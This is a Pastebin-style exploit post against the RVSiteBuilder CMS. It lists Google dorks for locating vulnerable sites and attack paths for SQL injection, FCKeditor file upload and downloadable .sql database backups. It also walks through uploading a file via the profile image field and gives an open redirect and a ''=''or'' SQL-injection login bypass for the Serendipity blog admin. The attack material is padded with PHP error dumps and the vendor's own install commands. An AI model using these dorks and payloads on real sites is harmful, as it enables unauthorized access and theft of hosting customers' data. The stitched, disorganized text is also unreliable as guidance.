Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #################################################################################################
- # Exploit Title : RVSiteBuilder RVGlobalSoft CMS 7.0 Multiple Vulnerabilities
- Vulnerabilities are =>
- ******************
- SQL Injection / File Upload / Authentication Bypass / Database Disclosure
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Team
- # Date : 14/02/2019
- # Vendor Homepages : rvsitebuilder.com ~ rvglobalsoft.com ~ ckeditor.com
- + dynarch.com/jscal/ ~ jquery.com ~ docs.s9y.org ~ seagullproject.org ~ seagullsystems.com
- # Social Media Link : facebook.com/Rvglobalsoft/ ~ facebook.com/RVsitebuilder-331466346876534/
- + twitter.com/rvsitebuilder ~ twitter.com/rvglobalsoft_
- # Version : 7.0 and all previous versions.
- # Google Dork : inurl:''/rvsindex.php/''
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : High
- # Vulnerability Types : CWE-209 [ Information Exposure Through an Error Message ]
- + CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
- + CWE-264 [ Permissions, Privileges, and Access Controls ]
- + CWE-200 [ Information Exposure ]
- + CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
- + CWE-592 [ Authentication Bypass Issues ]
- + CWE-23 [ Relative Path Traversal ]
- + CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
- + CWE-36 [ Absolute Path Traversal ]
- + CWE-538 [ File and Directory Information Exposure ]
- + CWE-548 [ Information Exposure Through Directory Listing ]
- # CxSecurity Exploit Reference Link : cxsecurity.com/ascii/WLB-2018060101
- #################################################################################################
- # RVSiteBuilder RVGlobalSoft CMS High-Performance 7.0 Hosting Provider Serious Multiple Vulnerabilities
- *********************************************************************************************
- # Vulnerabilities and Exploits includes =>
- ************************************
- 1) Full Path Disclosure Vulnerability
- 2) SQL Injection Vulnerability
- 3) Arbitrary File Upload Vulnerability
- 4) Arbitrary File Download Database Backup .sql Vulnerability
- 5) What You See Is What You Get [ WYSIWYG ] FCKeditor Exploiter File Upload
- 6) Blog Administration Control Panel Authentication Bypass Vulnerability
- 7) Directory Traversal Vulnerability and Information Exposure Through Directory Listing
- 8) Information Exposure Through an Error Message
- 9) Permissions, Privileges, and Access Controls
- #################################################################################################
- # Description : RVglobalsoft is the leading software solutions for hosting provider.
- ***********************************************************************
- # Google Dork 1 : inurl:''/rvsindex.php/''
- # Google Dork 2 : inurl:''/rvsindex.php?/user/login''
- # Google Dork 3 : inurl:''/rvsindex.php/user/register''
- # Google Dork 4 : Index of /js Parent Directory SGL.js SGL/ SglFckconfig.js TreeMenu.js datetimepicker.js
- #################################################################################################
- # RevSiteBuilder Full Path Disclosure Vulnerability and PHP Warnings and Errors [ SQL Injection ] =>
- *****************************************************************************************
- TARGET/blog/rvsindex.php?/sitebuilder/action/list/list.php=[SQL Injection]
- FOR CPANEL =>
- pear install -f /var/cpanel/rvglobalsoft/rvsitebuilder/scripts/RVSeagullMod-1.0.1.tgz
- perl /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/autoinstaller.cgi
- FOR DİRECTADMİN =>
- pear install -f /usr/local/rvglobalsoft/rvsitebuilder/scripts/RVSeagullMod-1.0.1.tgz
- perl /usr/local/rvglobalsoft/rvsitebuilderinstaller/autoinstaller.cgi
- #Warning: include(SGL_PATH/lib/SGL/FrontController.php): failed to
- open stream: No such file or directory in /home/DOMAINADDRESS
- /public_html/wysiwyg/fckeditor/editor/filemanager/connectors/php/config.php on line 264
- Strict Standards: Declaration of RVFlexyStrategy::initEngine() should be compatible with
- SGL_OutputRendererStrategy::initEngine() in /opt/cpanel/ea-php56/root/usr
- /share/pear/RVSeagullMod/lib/SGL/RVFlexyStrategy.php on line 89
- Strict Standards: Declaration of RVFlexyStrategy::render() should be compatible with
- SGL_OutputRendererStrategy::render($view) in /opt/cpanel/ea-php56/root/usr
- /share/pear/RVSeagullMod/lib/SGL/RVFlexyStrategy.php on line 89
- Strict Standards: Non-static method SGL_FrontController::isGoToClearCached()
- should not be called statically in /opt/cpanel/ea-php56/root/usr/share/pear
- /RVSeagullMod/lib/SGL/FrontController.php on line 257
- Strict Standards: Declaration of SGL_MDB2::query() should be compatible with
- MDB2_Driver_Common::query($query, $types = NULL, $result_class =
- true, $result_wrap_class = true) in /home/koleksim/.rvsitebuilder/websitepublish
- /3686a6380b5f3a8986f5ef385ce208f5/var/cachedLibs.php on line 82
- Deprecated: Non-static method SGL_Task_SetupPaths::hostnameToFilename()
- should not be called statically, assuming $this from incompatible context in
- /opt/cpanel/ea-php56/root/usr/share/pear/RVSeagullMod/lib/SGL/Config.php on line 60
- Warning: Include path '/usr/lib/php' not exists in /home/DOMAINADDRESS
- /public_html/rvscommonfunc.php on line 174
- Please contact your host provider ssh as root to server and run.
- Fatal error: Class 'SGL_FrontController' not found in /home/DOMAINADDRESS/public_html/rvsindex.php on line 20
- ####################################################################################################
- PATH => TARGET/ComponentAndUserFramework.php
- Please edit /home2/DOMAINADDRESS/public_html/php.ini
- change include_path to
- include_path = ".:/usr/php/54/usr/lib64:/usr/php/54
- /usr/share/pear:/usr/local/lib/php"
- # PATH for View Homepage => TARGET/rvsindex.php
- ####################################################################################################
- # RevSiteBuilder Admin Login Control Panel Authentication Bypass =>
- **************************************************************
- TARGET/admin or this is the Admin Panel way =>
- /rvsindex.php?/user/login/
- # PATH Admin Panel Login WordPress =>
- TARGET/wp-login.php?redirect_to=http%3A%2F%2FDOMAINADDRESS%2F%2Fwp-admin%2F&reauth=1
- # PATH Admin Panel Login Joomla =>
- TARGET/administrator
- # PATH Admin Panel Login osCommerce =>
- TARGET/admin
- # PATH Admin Panel Login OpenCart =>
- TARGET/admin
- Note : Some RVSiteBuilder websites uses wordpress and joomla
- but all files belongs to revsitebuilder and rvglobalsoft software.
- It is totally weird vulnerability.
- They have path like TARGET/blogweb or TARGET/osc
- But some sites gives this error. Sometimes it asks for username and password.
- Please contact your provider edit file php.ini
- change include_path to
- include_path = ".:/usr/lib/php:/usr/local/lib/php"
- save file and restart apache
- ####################################################################################################
- # PATH for Uploaded Documents =>
- TARGET/documents/
- ####################################################################################################
- # PATH for JS JQuery-Ui Demos and Documents [ View Original Sources ] => T
- TARGET/js/jquery-ui/demos/ and TARGET/js/jquery-ui/docs/
- # You can view => Interactions - Widgets ~ Effects ~ About jQuery UI ~ Theming - View Sources
- ####################################################################################################
- # PATH for JQuery Tests Version => TARGET/js/jquery-ui/tests/
- ####################################################################################################
- # PATH for Themes Codes => TARGET/js/jquery-ui/themes/base/ and TARGET/js/themes/
- ####################################################################################################
- # PATH jscalendar-1.0 "It is happening again" => TARGET/js/jscalendar/ => The Coolest DHTML Calendar - Online Demo
- ####################################################################################################
- # PATH Changelog Last Changes => TARGET/js/scriptaculous/CHANGELOG
- ####################################################################################################
- # PATH Learn Version => TARGET/js/scriptaculous/VERSION
- ####################################################################################################
- # PATH for Optimizer => TARGET/optimizer.php
- Please edit /home2/DOMAIN/public_html/php.ini
- change include_path to
- include_path = ".:/usr/php/54/usr/lib64:/usr/php/54/usr/share/pear:/usr/local/lib/php"
- ####################################################################################################
- # Other Paths that gives same error =>
- #TARGET/rvsMasterCompoDB.php
- #TARGET/rvsStaticWeb.php
- #TARGET/rvscommonfunc.php
- #TARGET/rvssetup.php
- Please edit /home2/DOMAIN/public_html/php.ini
- change include_path to
- include_path = ".:/usr/php/54/usr/lib64:/usr/php/54/usr/share/pear:/usr/local/lib/php"
- ####################################################################################################
- #QuickForm tutorial example - *Enter your name:
- #/scripts/rvslib/Pear/quickFormTest.php
- #/themes/default/default/testForms.html
- ####################################################################################################
- #{if:adminApprove} {adminApprove}
- #/themes/rvtheme/authweb/authPage.html
- ####################################################################################################
- #{foreach:aFaqData,key,aValue} {if:aValue.category_name}
- #/themes/rvtheme/faqweb/viewFaqWeb.html
- ###################################################################################################
- #{if:forumsInstall} - Search for forums
- #TARGET/themes/rvtheme/forums/blocksearch.html
- ####################################################################################################
- # Testing forms
- # /themes/default/testForms.php
- #################################################################################################
- # RevSiteBuilder RVGlobalSoft Open Redirection Vulnerability
- # TARGET/login => It automatically redirects to this URL Link here => /rvsindex.php?/user/login/action/login
- # Open Redirection Page /rvsindex.php?/user/login/redir/ANY-DOMAIN-ADRESS
- #################################################################################################
- # {translate(pageTitle)} Contactus
- # /themes/rvtheme/main/contactMail.html
- #################################################################################################
- #{translate(#Please enter your name and e-mail address and select the newsletters that you want to subscribe.#)}
- #/themes/rvtheme/newsletter/authorize.html
- #/themes/rvtheme/newsletter/list.html
- #/themes/rvtheme/newsletter/uikit_list.html
- #################################################################################################
- #RVTheme Admin Area and Users useable Login Paths =>
- #/themes/rvtheme/user/account.html
- #/themes/rvtheme/user/accountSummary.html
- #/themes/rvtheme/user/blockLogin.html
- #/themes/rvtheme/user/blockLogout.html
- #/themes/rvtheme/user/horizontalBlockLogin.html
- #/themes/rvtheme/user/loginForgot.html
- #/themes/rvtheme/user/prefUserEdit.html
- #/themes/rvtheme/user/profile.html
- #/themes/rvtheme/user/uikit_login.html
- #/themes/rvtheme/user/uikit_loginForgot.html
- #/themes/rvtheme/user/uikit_prefUserEdit.html
- #/themes/rvtheme/user/uikit_userAddUseCompoDB.html
- #/themes/rvtheme/user/uikit_userPasswordEdit.html
- #/themes/rvtheme/user/userAdd.html
- #/themes/rvtheme/user/userAddUseCompoDB.html
- #/themes/rvtheme/user/userPasswordEdit.html
- #/themes/rvtheme/user/verticalBlockLogin.html
- #/themes/rvtheme_admin/articleweb/admin_articleEdit.html
- #/themes/rvtheme_admin/articleweb/admin_articleManager.html
- #/themes/rvtheme_admin/articleweb/admin_articleTypeEdit.html
- #/themes/rvtheme_admin/articleweb/admin_articleTypeManager.html
- #/themes/rvtheme_admin/faqweb/admin_faqCategoryEdit.html
- #/themes/rvtheme_admin/faqweb/admin_faqWebEdit.html
- #/themes/rvtheme_admin/faqweb/admin_faqWebManager.html
- #/themes/rvtheme_admin/css/
- #####################################################################################################
- #Learn Version of the RVSiteBuilder and RVGlobalSoft => TARGET/version.txt
- #####################################################################################################
- #Flash Player Version Detection => TARGET/Scripts/AC_RunActiveContent.js
- #####################################################################################################
- Getting started with Seagull Project => [ Seagull PHP Framework - © Seagull Systems 2003-2007 ]
- /rvsindex.php?/default/masterLayout/layout-navtop-3col.css/
- #####################################################################################################
- # RevSiteBuilder SQL Injection Vulnerability =>
- *****************************************
- #Strict Standards: Declaration of RVFlexyStrategy::initEngine() should be
- compatible with SGL_OutputRendererStrategy::initEngine() in /usr/local
- /lib/php/RVSeagullMod/lib/SGL/RVFlexyStrategy.php on line 89
- #Strict Standards: Declaration of RVFlexyStrategy::render() should be compatible
- with SGL_OutputRendererStrategy::render($view) in /usr/local/lib/php
- /RVSeagullMod/lib/SGL/RVFlexyStrategy.php on line 89
- #Warning: include(SGL_PATH/lib/SGL/FrontController.php): failed to
- open stream: No such file or directory in /home/DOMAINADDRESS
- /public_html/wysiwyg/fckeditor/editor/filemanager/connectors/php/config.php on line 264
- #################################################################################################
- # What You See Is What You Get [ WYSIWYG ] Exploiter =>
- *******************************************************
- # WYSIWYG FCKeditor Arbitrary File Upload Vulnerability and Exploit
- # Exploit => ..../wysiwyg/fckeditor/editor/filemanager/connectors/uploadtest.html
- # Example Site => /images/....
- # Allowed File Extensions => .txt .png .gif .jpg .xml
- # Sometimes Wysiwyg Editor Gives this error when trying upload a file to the server
- Please contact your host provider ssh as root to server and run.
- For cpanel
- pear install -f /var/cpanel/rvglobalsoft/rvsitebuilder/scripts/RVSeagullMod-1.0.1.tgz
- perl /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/autoinstaller.cgi
- For directadmin
- pear install -f /usr/local/rvglobalsoft/rvsitebuilder/scripts/RVSeagullMod-1.0.1.tgz
- perl /usr/local/rvglobalsoft/rvsitebuilderinstaller/autoinstaller.cgi
- Tutorial '' How to download RVsiteBuilder package file manually ? ''
- For cPanel
- --------------------
- SSH to your cPanel server as root and run command
- cd /usr/local/cpanel/whostmgr/docroot/cgi/
- rm -rf /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/
- rm -f rvsitebuilderinstaller.tar
- wget http://download.rvglobalsoft.com/rvsitebuilderinstaller.tar
- tar -xvf rvsitebuilderinstaller.tar
- rm -f rvsitebuilderinstaller.tar
- mkdir /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/packages
- cd /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/packages
- wget http://download.rvglobalsoft.com/download.php/rvsdownload/scriptdownloadpackage.tar
- tar -xvf scriptdownloadpackage.tar
- /usr/local/cpanel/3rdparty/bin/php scriptdownloadpackage.php
- Once complete download file manually, please follow the instruction in this link. https://www.rvsitebuilder.com/installation/
- --------------------
- For DirectAdmin
- --------------------
- SSH to your cPanel server as root and run command
- cd /usr/local/rvglobalsoft/rvsitebuilderinstaller/packages
- wget http://download.rvglobalsoft.com/download.php/rvsdownload/scriptdownloadpackage.tar
- tar -xvf scriptdownloadpackage.tar
- php scriptdownloadpackage.php
- Once complete download file manually, please follow the instruction in this link. https://www.rvsitebuilder.com/installation/
- Reference => rvglobalsoft.com/knowledgebase/article/148/how-to-download-rvsitebuilder-package-file-manually/
- Reference => rvskin.com/rvlogin/rvloginssh
- ##################################################################################################
- # RevSiteBuilder Arbitrary File Database DB Backup .sql Download Vulnerability
- # TARGET/rvsDbBackup.sql => OR download and view SQL Database Backup Files => TARGET/rvsUtf8Backup/rvsDbBackup.sql
- # View RevSiteBuilder Page Data Backup => TARGET/rvsUtf8Backup/rvsPageData.sql
- # Example Site DB Backup View => archive.is/Demkr
- ###################################################################################################
- 1) Register yourself to the site
- TARGET/rvsindex.php?/user/register/
- It says => You have successfully been registered. Please check your email for confirmation of your password.
- Note : Confirm your registration in order to proceed.
- Sometimes RVSiteBuilder and RVGlobalsoft gives you a new password or you choose your password while registration.
- Pay attention : When you register choose your nickname carefully because it is important.
- It says => Activation is successfully. Please login.
- 2) Login to the User Interface =>
- TARGET/rvsindex.php?/user/login/action/login
- 3) You can use Account - User Preference - User Password Change Area
- /rvsindex.php?/user/account/action/viewProfile/
- /rvsindex.php?/user/account/
- /rvsindex.php?/user/userpreference/
- /rvsindex.php?/user/userpassword/action/edit/
- 4) Go to your Profile like this =>
- TARGET/rvsindex.php?/user/account/action/viewProfile/
- Edit these Values
- Choose Image Upload => Allowed File Extensions ( jpg,gif,bmp,png,txt,html)
- It says => Your profile details have been successfully updated
- PATH : /themes/rvtheme/images/YOURNİCKNAME.
- Note : Your chosen nickname is important while registration. Upload your html or txt file but do not put like this .yournickname.html
- Just . [ dot ] is important here. You will see your index on that site.
- #################################################################################################
- # Serendipity RevSiteBuilder Blog Administration
- # /blogweb/serendipity_admin.php
- # Username : '=''or'
- # Password : '=''or'
- # You can use for both of them as '' admin '' '' admin ''
- # /serendipity/serendipity_admin.php?serendipity[adminModule]=media&serendipity[adminAction]=addSelect
- # /blogweb/serendipity_admin_image_selector.php?serendipity[htmltarget]=img_icon&serendipity[filename_only]=true
- # /blogweb/serendipity_admin.php?serendipity[adminModule]=media&serendipity[adminAction]=addSelect
- # /blogweb/serendipity_admin.php?serendipity[adminModule]=personal
- # /blogweb/uploads/yourfilename.rar
- # Solution for Serendipity Blog Administration
- # To mitigate this issue please upgrade at least to version 2.0.2:
- # Download Link : https://github.com/s9y/Serendipity/releases/download/2.0.2/serendipity-2.0.2.zip
- # Please note that a newer version might already be available.
- #################################################################################################
- How to Install RVsitebuilder for Hosting Provider [ Bugs Fixation ] Check every folder and limit with .htaccess
- cPanel
- ssh to your server as root and install plugin 'RVglobalsoft manager' by run following shell command:
- cd /usr/src; rm -fv rvsitebuilderinstall.sh; wget http://download.rvglobalsoft.com/rvsitebuilderinstall.sh; chmod +x rvsitebuilderinstall.sh; ./rvsitebuilderinstall.sh
- Login to WHM as root. Go to WHM > Plugins > and run RVglobalsoft manager then follow simple install process.
- Configure plugin for your panel. It's all done! RVsitebuilder is ready to use for all your users.
- DirectAdmin
- ssh to your server as "root" and install plugin 'RVglobalsoft manager' by run following shell command:
- cd /usr/src; rm -fv rvsitebuilderdainstall.sh; wget http://download.rvglobalsoft.com/rvsitebuilderdainstall.sh; chmod +x rvsitebuilderdainstall.sh; ./rvsitebuilderdainstall.sh
- For DirectAdmin panel with PHP version 5.5 only (If your panel is lower version of PHP, skip to step 3)
- 2.1 Run the following command to make RVsitebuilder compatible with PHP 5.5:
- perl /usr/local/directadmin/plugins/rvsitebuilderinstaller/admin/installphpda.pl
- 2.2 Run the following command to make RVseagullmod compatible with PHP 5.5:
- perl /usr/local/rvglobalsoft/rvsitebuilderinstaller/autoinstaller.cgi --force=rvseagullmod
- Open file 'directadmin.conf' that located in: usr/local/directadmin/conf/directadmin.conf and change the value of 'numservers' from 5 to 15
- Go to Directadmin > Admin level > and run 'RVsitebuilder Admin' then follow simple install process.
- Login to DirectAdmin as "admin" and Configure plugin on your panel.
- RVsitebuilder in DirectAdmin plugins cannot configure hosting plans but
- you can set plans in user level by RVsitebuilder Admin
- Go to Directadmin > Admin level > open RVsitebuilder Admin and configure in 'User Control List' or 'Reseller Control List.'
- #################################################################################################
- RVSiteBuilder Last Changes and Bugs Fixation Reports [ Changelog ] => rvsitebuilder.com/changelog/
- RVSiteBuilder Installation => rvsitebuilder.com/installation/
- RVSiteBuilder and RVGlobalSoft Tutorials =>
- rvsitebuilder.com/tutorials/ ~ rvglobalsoft.com/installation/ ~ documentation.cpanel.net/display/68Docs/Installation+Guide
- #################################################################################################
- # Discovered By KingSkrupellos from Cyberizm Digital Security Team
- #################################################################################################
Add Comment
Please, Sign In to add comment